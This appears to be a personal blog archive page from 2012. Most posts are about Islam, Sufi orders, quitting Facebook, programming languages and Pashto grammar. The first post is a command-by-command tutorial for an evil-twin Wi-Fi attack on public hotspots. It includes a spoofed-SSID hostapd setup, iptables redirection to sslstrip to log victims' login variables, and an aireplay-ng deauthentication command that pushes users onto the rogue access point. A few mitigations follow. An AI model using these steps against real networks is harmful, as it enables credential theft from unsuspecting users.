The Critically Cognitive

Hotspot Hijacking & Password Capturing

May 16, 2012 Leave a comment

Unless you know enough about security to know what’s going on behind the scenes, Wifi is beyond insecure. Even with SSL as an attempt to secure a web connection, your connection is still fundamentally insecure. This is an explanation of how someone would capture passwords and other variables sent over an SSL connection that uses Wifi. In essence, its a Man in the Middle (MiM) attack over Wifi that modifies the victim’s HTTP connection and thus gathers GET and POST variables. I was not the first to create it, but I independently thought of it and then combined a few techniques together.

Here’s how it works:

Lets say you go to a Starbucks and they offer an open Wifi connection. Suppose the AP name is attwifi. First, the attacker connects his computer to the legitimate AP so that he can go online. The attacker can use a separate means to get online, I just find this most convenient.

Using a second wifi card that can go into Master mode, set the IP address to something the legitimate Wifi network does not use. No one uses 172.16.1.0/24, so when I was testing this I used that. Since the attacker’s machine will balance between the legitimate AP and fake AP, it needs to be able to distinguish between the two and prevent collisions. So 172.16.1.1 works great.

ifconfig wlan0 172.16.1.1
ifconfig wlan0 up

Then, the attacker must configure dhcpd, in my case, located in /etc/dhcp/dhcpd.conf:

subnet 172.16.1.0 netmask
	255.255.255.0 {
	range 172.16.1.2 172.16.1.254;
	option domain-name-server 172.16.1.1;
	option routers 172.16.1.1;
}

On the second wifi card the attacker must then create an AP by the same name as the legitimate AP. Most public APs are Open networks without any encryption or anything. But even if they weren’t open, the host would likely just give you the password upon request. To create an open network, the attacker must set the following settings in /etc/hostapd/hostapd.conf:

interface=wlan0
driver=nl80211
ssid=attwifi
hw_mode=g
channel=11

Finally, start to turn stuff on. First, the layer 3 routing and NAT rules:

echo 1 > /proc/net/ipv4/ip_forward # Allows routing
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Turns on NAT
iptables -A FORWARD -j ACCEPT # Accepts everything

Then turn on dhcpd:

dhcpd

Then I start broadcasting the Access Point:

hostapd /etc/hostapd/hostapd.conf

At this point, anyone who connects to attwifi will either connect to the attacker, or the authentic AP. As of now it makes no difference who they connect through. If they connect through the attacker’s AP, they will just be forwarded through the real attwifi AP anyways with a unnoticed extra hop.

Up to this point you’ve simply done a Man in the Middle (MiM). The final step is where the magic lays. The attacker must redirect connects to port 80 through sslstrip, a tool that intercepts a victim’s web requests, and removes all references of SSL (ie, changes ‘https’ to ‘http’) and logs all relevant variables that are passed over. For the record and so that I don’t come across as a complete script kiddie, I wrote a tool similar to sslstrip, but sslstrip is significantly better and cleaner written.

The attacker would do this:

iptables -t nat -A PREROUTING -p tcp -s 172.16.1.0/24 --dport 80 -j DNAT --to-destination 172.16.1.1:31337
python ./sslstrip.py -w attwifi.log -l 31337

At this point, the attacker’s machine will be logging GET and POST variables directed through his machine, even if the connection was intended to be secured with SSL. The only sign the victim may notice is that his usually SSL-encrypted connection is no longer secure. A savvy user might notice this, but the vast majority will not. In fact, the way most sites are written, such as Facebook, you enter your credentials onto an initial insecure page! While the form‘s GET or POST target is secure, the page you received is certainly not. Unless he checks the initial page’s code, he would never know that his connection is being tampered with.

There’s one final optional step. A client might be connected to the correct AP for hours without any reason to disconnect. With Windows, if there are multiple APs by the same name and the user is experiencing connection issues on one, Windows will automatically switch to the other AP. You can break a user’s connection and force him to connect through you using the following command:

aireplay-ng -0 0 -a 00:AA:BB:CC:DD:EE -c 01:12:34:56:78:9A ath0

Where 00:AA:BB:CC:DD:EE is the access point and 01:12:34:56:78:9A is a client. This last step is particularly insidious.

The fundamental issue here is not a weakness in SSL, but in Wifi that allows for an easy MiM. However, there are some steps a web site can take to help fix the problem:

Require users to go to https://www.site.com instead of http://www.site.com. A simple redirection or link will not do, as sslstrip and similar programs can capture the redirection-attempt.
Javascript code that does client-side verification to scan for for page modifications
Two-factor authentication, such as an RSA token. While this will not stop the attacker from capturing your variables, it makes re-authentication as the victim impossible. Also a great solution, but won’t prevent against data leakage.
Have the user click a link that requests login. Once at the new page, have an image pointing up at the URL bar and asking the user to verify if SSL is being used. But, this requires too much user-verification.
Change the port from 80 to 8080, or so, thus temporarily thwarting the iptables rule. But obviously a broader or more focused iptables rule would counter-thwart that.

Your thoughts…?

I doubt I have to legally add a disclaimer, but I’ll do it anyways… don’t do anything illegal! You are responsible for your own actions!

Filed under Computer Science Tagged with hack, security

Numerous Programming Languages

May 12, 2012 Leave a comment

There are numerous programming languages out there, some of which have general purpose and some have specific purposes. Here are some of the languages I’ve come across.

Assembly Language – This is not so much a language, as a way to write raw CPU instructions in a way that’s more human readable. I’ve only seen it used to write simple libraries and low-level operating system functions.
BASIC – A business programming language used to perform simple tasks or games.
C/C++ – These are general purpose languages that run directly on the hardware, which means dealing directly with memory and operating system specifics. Their manipulation of the hardware can only be through the operating system.
C# – Uses C++, but calls upon a uniquely Microsoft .NET library.
Java – A general purpose language that does not run on the physical hardware. It was primarily built to make the binary executable portable across all physical platforms and OS’s
Perl – An interpreted scripting language. It was initially created as a “glue language” to perform simple tasks or fit into unique places (such as a robust CGI language).
PHP – A web scripting language that is interpreted through a PHP interpreter.
Python – Object-oriented, multi-platform, interpreted language (which means it requires an interpreter). Never used it, so here it is.
Ruby – I don’t know much about, so here’s a link.

This list could go on forever. I should also add Fortran and Pascal to this list (but I won’t).

There is no “best language”, there are just different languages for different purposes. But if you are going to learn a language for general purposes, I would suggest C++, one of those .NET languages or Java.

Filed under Computer Science Tagged with Programming

Ottomans vs Arabs – Now Haqqanis vs Salafis

May 6, 2012 Leave a comment

Salafi/Wahabis have a sect who call the Saudi king “the rulers”, pledge to them, listen to what they say, and consider criticizing them a form of religious deviance.

Similarly, the Naqshbandi-Haqqanis consider the Ottoman Empire a righteous empire, and consider their Sultans Awliya’.

The Ottomans and Arabs went to war after World War 1, which to this day, leads to conflict between the two religious communities across the world. The Salafi-Wahabis hate no Sufi tariqa more than the Naqshbandis-Haqqanis, and the Naqshbandi-Haqqanis hate no religious community more than the Salafi-Wahabis.

Just an observation…

Filed under Theology

Letter to Lady Curious about Islam

April 11, 2012 1 Comment

I wear a traditional Islamic hat/headcovering pretty much wherever I go. Last week, I went to a Subway on campus, and a lady called me “brother”. I figured she was a Muslim, but she said she wasn’t, but was interested in Islam. She asked me for literature, then asked again to emphasize the point. I went out and bought her a Qur’an, a book on the biography of the Prophet Muhammad ﷺ, and a pamphlet. I also wrote her the following note:

As-salaam ‘alaykum Sister!

Was good meeting you the other day. You made my day by identifying me as a Muslim by my appearance alone. I felt honored.

You requested Islamic litreature, so I enclosed 3 books. The first is the Qur’an. The entirety of the Qur’an has one central message that is repeated again and again in different ways and forms: There is only one God, direct your life, worship and very existance to him alone. Keep this in mind throughout your reading of it. If you have questions, take them to a reputable authority for answers.

The second book is “Muhammad, His life and times based on the earliest sources” by Martin Lings, who was a Muslim. It is a biography of the life of our Prophet. The recently deceased author at times employs a Shakespearean classical English style, I hope you enjoy it. I must admit, it moved even dry-eyed me to tears a few times. — The last book is a pamphlet of basic information you probably already know but is good to have and read.

While books are great, Islam is primarily conveyed from heart-to-heart. Its best to find a community and become a part of it. Thats the only way a person can truly come closer to God, going on your own has its merits but can confuse a person. Social company is important for support and companionship.

I feel it necessary to say, within the Muslim community, as with all communities, there are peopel with destructive ideas and questionable character. In general, with such people, be polite and respectful, but avoid mixing too much. It will be pretty obvious who they are, but a few problems stand out above the rest. Be weary of people who use and abuse women, but use the pretext of religion to defend their behavior. Outwardly they seem to know their stuff, but in reality they are deeply ignorant of Islam. A common sign of such people is rapid, rushed marriage followed by even quicker divorces. Also, avoid peopel who constantly criticize others and argue and debate. Islam should make pople critical of themselves and blind to the faults of others. A common characteristic to avoid is calling other Muslims “deviant” or “innovators” over small issues.

In terms of practice, I would suggest learning about being in a state of ritual purity. This is called wudu, which is a washing of the limbs and head, or ghusl which is essentially a bathe — Both done with a present mind, heart and proper intentions to seek purity before GOd. The outward act is a window into what you are doing to your spiritual heart. To learn it, consult your local community. Its pretty simple and easy to learn.

The purpose of Islam is to bring you closer to God through submission. If you decide to accept it, and the choice is entirely yours, no forcing you, know that the path is not always easy or smooth. No road has more potholes. But the trials and tribulations thta come our way serve only to raise our ranks and honor in the sight of God. As Allah says in the Qur’an, “With every hardship is an easy (Again for emphasis) With every hardship is an ease.” And in the end, the fruits of the struggles of life are worth it — both in this life and the next.

I hope this helps and apologize for my bad handwriting!

[My real name and email address]

Filed under Life Experiences Tagged with Dawah

Why I stopped being a Salafi

March 14, 2012 Leave a comment

To understand this, you need to understand my background as a Muslim, what my sources of education were and what experiences I went through. Mere arguments are not what brought me to this change.

I grew up knowing very little about Islam. My understanding was essentially that I was not supposed to drink, eat pork, or have girlfriends. I knew there were 5 daily prayers, but could not mention their number of rakahs, much less their names. I was ignorant of my ignorance.

When I entered college, I envisioned myself engaging in sins just like the people around me. But something happened, and my mother’s lessons from childhood really made me reconsider. Mind you, the skinny ignorant 18 year old version of myself was offered drugs, alcohol and zinnah on a daily basis – literally. On the weekends, my hallmates would go out and live that typical freshman college lifestyle. They would come back at 4am and talking about who was “so wasted” and how hot some girl was. All the while, I sat in my dorm and did nothing. TV was boring, no one was on AIM, sites like Facebook did not exist. Every week I looked forward to the weekend so that I could have time off school, and every weekend I looked forward to the week to rescue me from loneliness. You might find this crazy, but I watched all three of the Godfather movies around 9 times each, just to pacify myself.

I discovered the MSA around the same time. They were a beacon of hope. Here are Muslims who are funny, smart, educated, good looking…and yet religious. Just what I needed. They were the alternative to the corruption I was around. One day, I attended a halaqa, which they would have once a week or so, and the speaker talked about the dhikr (remembrances done as a chant) after prayer. I had been taught them as a child, but forgot what they were, so I asked. One of the guys there, an Afghan, told me them, wrote it down on a paper, and gave it to me. I used that paper for a few months to come.

It just so happened that a few days later I was going to meet this girl I was semi-interested in for lunch, when I ran into that same Afghan guy again. He said he had been thinking of me and wanted to teach me some more. Instead of meeting that girl, I went to his place where I met his roommates. He made food for everyone and we spent a few hours talking. I said I was interested in learning about Islam more, and he was much obliged. I remember, he re-taught me how to read Arabic, some basic fiqh, other aspects that I simply did not learn as a child.

During those lessons, he would gradually slip in a few Salafi talking points. I still recall the very first one, that Allah has a hand, how? We don’t know. The book of graciously provided was Nasir al-Deen al-Albani’s book. I was told that the Asharis were bad and corrupt, though I cannot recall the word ‘deviant’ ever used. I accepted then without question. What else did I know?

Around the same time, I started asking slightly more detailed questions about the Deen, mostly revolving around practice (fiqh). From the MSA, I was introduced to the concept of the madhhabs. This notion seemed entirely alien to me. So now there are four versions of Islam? I was taught since childhood that there was only one Islam. This particular dispute caused some arguments, but nothing serious. Even my immediate roommate and I would argue, but it never caused any serious problems.

After two years, I later transferred to another university. Most of the MSA were Salafi, but I did not think much of it. In retrospect, I realized that they were slowly unintentionally influencing me. I also started taking Al-Maghrib classes for the first time. Honestly, I benefited a lot. I started praying Fajr on a consistent basis for the first time, I started to appreciate the Qur’an more, started to expand my understanding of the Deen, lots more. When I graduated, I started taking Islam more seriously than I ever had before. I read more books, took more classes, attended the masjid on a nightly basis, and so on. I used to go to a local Islamic book store, purchase a book or two, and read it within the week. For a short time, I cut Facebook and AIM. Once, my mom walked into my room to find me memorizing the Qur’an. It was a great time and I think Allah for it.

Around this time, I completely accepted the ideas of Salafiyya. I perceived it as a pure Islam, not invaded by cultural innovations. Keep in mind, I was somewhat critical of Pakistani culture throughout this, so kind of “Pakistani Islam” was wrong, while I perceived all Arab culture as 100% pure Islam.

Then the break…there were two main breaks in my acceptance of Salafiyya, one was a sudden loss based on emotion, and the other was gradual and intellectual.

The emotional break took place over the course of a few days. I found myself very depressed. Deeply depressed. But, reading the same books, the same articles, all the intellectualism that Salafiyya offered did not help me. I would get upset or find ways to argue against the answers it provided me. The worst betrayal was how the Salafis would treat me. When I would speak to them or ask probing questions in my desperation, I would get yelled at or talked down to. In one particular case, it was especially offensive and rude from someone who had studied for a long time. I thought to myself, how can someone who studied so much behave this way? Hasn’t Islam tempered his emotions and made his character like that of the Prophet صلى الله عليه و سلم? This was not the first time I had seen this kind of behavior, but it was a major turning point.

The intellectual change was different. It started with fiqh. The argument I was taught was that we follow the Qur’an and Sunnah say, not what an Imam from 1400 years ago said. I liked the idea of following the Qur’an and Sunnah overly blindly following some mere interpretation. But what I started to realize was that I was doing exactly that – I was blindly following the interpretations of the likes of Al-Albani. What different did it make whether I was following a Salafi Shaykh’s opinion? It was blind following both ways. But at least the madhhabs were from the period of the Salaf, while these people were from contemporary times. I was already on my way out of it, and it was an Al-Maghrib teacher who ultimately solidified my resolve, and I chose the Shafi’i madhhab. With regards the ‘aqidah, I found them placing a lot of emphasis on things that really had no importance to me in my day to day life, like where is Allah and what kind of hand he has. With regards to spirituality, I felt that the Salafi approach was empty. It was about actions, but when push came to shove, it offered no solution to finding a way out. What helped me out where the long talks I had with my friend of the Shadhili Sufi tariqa.

For a short while I fell in line with the Naqshbandi-Haqqani Tariqa. But to be honest, they were constantly rude, insulting, and condescending to me. Their local leader would use extremely hurtful comments to me, sometimes for fun as if it was a sport. Their Shaykh once started calling me “Pepsi” because I was wearing a shirt that had a Pepsi logo on it. I found that rude. I heard him curse on two separate occasions, very unbecoming. Their Shaykh barely knows Arabic and mispronounces tons of words. They pray faster than anyone can, even faster than I can recite Surah al-Fatiha even if I rush it. I know on at least one occasion the constant rude comments almost resulted in a fight breaking out between a mureed and a former Shi’a. They overate and talked down about women and many times directly to women. They all but completely reject learning Islamic knowledge So that Tariqa turned me off. However, I also saw many good things in them. So I was confused.

While I liked the Shadhili order, their Shaykh is about a 2 hour drive away from me. I needed something a bit more consistent. I found the Naqshbandi-Mujaddidi tariqa. I like them a lot, they married Islamic knowledge with spirituality. I wish I could be half of what their mureeds are like.

I could go on…but that’s enough for now.

Filed under Introspection, Life Experiences

My Quitting Facebook Plan

February 29, 2012 Leave a comment

Let me be honest with myself. I’m addicted to Facebook. Its one of the sites I check up on on a daily basis. I find myself just browsing people’s profiles and making stupid status updates. It gets in the way of work, and worst of all, sometimes I feel like I’m not doing anything with my life while others are doing all these cool things. I’ve quit cold turkey a few times, only to come back to it.

But now I have a new strategy on significantly reducing my Facebook usage. The premise is to gradually erode my usage until its zero. Here it is:

Step 1) Delete tons of old status comments;
Step 2) Lock my wall from allowing others to comment;
Step 3) Stop writing status updates (this required a great deal of self-control);
Step 4) Unsubscribe to people on the News Feed thingy – This is a manual process and takes place over time;
Step 5) Well…I haven’t gotten there yet, but I’m sure there will be one.

Ultimately, I want to relegate my Facebook usage to only the chat feature. On my personal machine I can use that in Pidgin (A universal chat program) and never actually log in through the web interface. I want to maintain the chat feature because I have cousins from overseas who I’d like to keep in touch with. Other than that, this service is a burden, not a blessing.

Life is not meant to photographed and thrown online for everyone to click ‘Like’ and comment on. Its meant to be experienced.

Filed under Introspection

What Evolution Means for Religion(s)

February 23, 2012 Leave a comment

I feel uncomfortable saying “Religion”, because its a bit like saying “Sports”, which is vast and diverse, but I will try anyways but focusing on the Abrahamic faiths.

Given evolution, what does that mean for our understanding of religion? There are three options:

Evolution is correct. This new position does not eliminate the belief in God, as Evolution is silent on whether God does or does not exist. The only faiths that would be harmed are those which posit that God created humanity exactly as he currently is.

The second option is to accept that evolution is the current dominant theory and evidence supports it, but that one day it will be proven wrong and will collapse under greater evidence.

The third option is to deny it entirely, which has and will continue to always fail and make all religions look stupid.

The only tenable positions are the first and second. The third is bound to fail.

Filed under Societal Commentary, Theology

Observations on Pashto Grammar

February 23, 2012 Leave a comment

Pashto (Pakhto) a language spoken in Northern Pakistan and throughout Afghanistan. I’ve been slowly learning it for a few months now. Here’s what I noticed about the grammar. Sentence structures are:

[Subject] [Object] [Verb]

If you can understand this basic pattern, the rest is much easier.

The ending of -a on a noun makes it feminine. The prefix of na- negates a verb, but if the sentence is a noun-sentence (ie, Is X Y) then you put the na after the second noun.

They have a lot of kha’s. Seems like that’s every 3rd letter. That’s the difference between Kandahari and Peshawari Pashto.

Lots more later, in sha Allah…

Filed under Societal Commentary

A Mother’s Heart

February 13, 2012 Leave a comment

Once, a man was so in love with a beautiful woman. Despite his pledges to her, she refused his advances saying she would only accept him if he proved his love by cutting out his mother’s heart and giving it to her. So the man went to his mom, violently killed her, and cut out her heart. As he was running back to the woman, with blood all over his hands and shirt and his mother’s heart in his hands, he tripped and fell on some rocks and the heart fell in front of him. The man looked up at the heart, which beated and said “O dear son, are you okay?”

Filed under Introspection, Life Experiences Tagged with Love, Mother

The Atheist and the Mureed

February 10, 2012 Leave a comment

A city bus carries a diverse array of individuals. Crowded and weathered, it just so happened that on this particular day the bus carried an mureed, deeply immersed in his faith, and an atheist, very much in the belligerent tradition of Dawkins.

The atheist had recently returned from a skeptics meeting, where they purported to champion reason and science over dogmatic superstitions. As he sat there, looking around on the bus, his eye was caught by the Mureed. Sitting there with his unusual black headcovering, loose clothing, and prayer beads, he was chanting something under his breathe, just barely audible.

The Mureed’s whispered chanting continued through the ride, and the atheist grew more and more angry. This person is practicing a backwards, archaic, antiquated faith that should be destroyed in the light of reason. In an instant, the bus passed over a pothill, shook the bus, and the mureed’s chanting was heard for a split second. “il Allah…” he said, and then his voice went back to normal.

At this, the atheist had enough. “Who are you talking to? There’s no one on this bus who can hear you, but you keep mouthing off.”

The Mureed looked up. “I was reciting a dhikr…an incantations. Its a prayer. Sorry, was I disturbing you?”

“Prayer? To who? God? There is no God. You know that, right? You’re wasting your time and youthful life. Enjoy what you have in this one life, because there is nothing after it.” This grabbed the attention of the entire bus. Some were Christians who felt sympathetic to the mureed, others were apathetic, and a few more agreed with the atheist.

“There is a God, I believe in him”, responded the mureed. The atheist smiled. He knew the line of reason he would take the mureed upon to get him to admit his lack of proof, lack of evidence – mere blind faith. He had done this before, and no one had ever stood up to him.

“You believe in God? Show me proof. I demand you give me evidence, verifiable, demonstrable evidence. Prove to me that your God exists.”

At this, the Mureed smiled. He closed his eyes, placed one hand in his pocket, and recited an incanation. A moment passed as everyone waited for his response. Eyes still closed, he removed his hand from his pocket to produce a brown string of prayer-beads, demarked with a silver bead at regular intervals and a long ending, scrunched up in his hand.

He then spoke. “Pretend for a moment that I am blind. Pretend that I have never experienced sight in my entire life. Describe to me what this object in my hand looks like.”

The atheist was confused. This was certainly not the answer he expected. But he decided to humor the mureed. “It looks like small pieces of lint, some are different colors, with a black string connecting them. It also has a few shiny silver beads” Was that sufficient?

The mureed immediately responded, almost interrupting the atheist. Still with his eyes closed, he said “You described this object as black, brown, shiny. These are all terms a blind person has no understanding of. What does color mean to a person who has no experience with it?”

The atheist thought for a moment. “Then I would describe it in physical terms. Brown is a frequency of visible light that bounces off of the object. Shiny means light complete reflects off of the object. Its describable in scientific terms.” What would the mureed say to a scientific answer, he thought.

The mureed immediately responded, “I asked to describe what it looked like, not to describe it in physical terms. Wavelength helps me conceptualize it, but does not help me experience what it look like. How do I know sight is real? Describe it to me.”

The atheist was somewhat annoyed. This was not the direction he anticipated the conversation to go. “Well, obviously the experience of sight cannot be communicated to someone who has never seen before. He has no frame of reference. But, that doesn’t mean sight does not exist, we can all see, unlike your God who has no proof.”

“We all know light exists. But the experience of sight cannot be described in scientific terms, its something each individual has to experience himself. Then we come to recognize what it is and believe in it based on our experience of it.” He stopped for a moment, a pause. What does this have to do with God, the atheist retorted, protesting he asked about God, not colors.

“Because God is not a mere intellectual proposition. He isn’t something you study through measurement and describe in physical terms. God reveals himself to us, and we taste that experience, just as you see or hear or feel. It is not something I can describe to you, other than to say its real. I’ve experienced it.”

The atheist did not know what to say. This mureed was speaking a language he was not used to. Then the atheist borrowed a line from Dawkins. “Your God is just a delusion you’re inducing on yourself.”

The mureed smiled. “Your sight is a delusion you’re experiencing. Prove otherwise to a blind person.” The bus gasped and the atheist was dumb-founded…

God is not something only the intellectual elite can examine. Sometimes, the mind can even get in the way. God is something to be experienced, specifically, by reflecting on his signs in natural beauty, reciting his divine words and excessive worship.

Filed under Secularism Tagged with Atheism, Debate, Sufism

← Older posts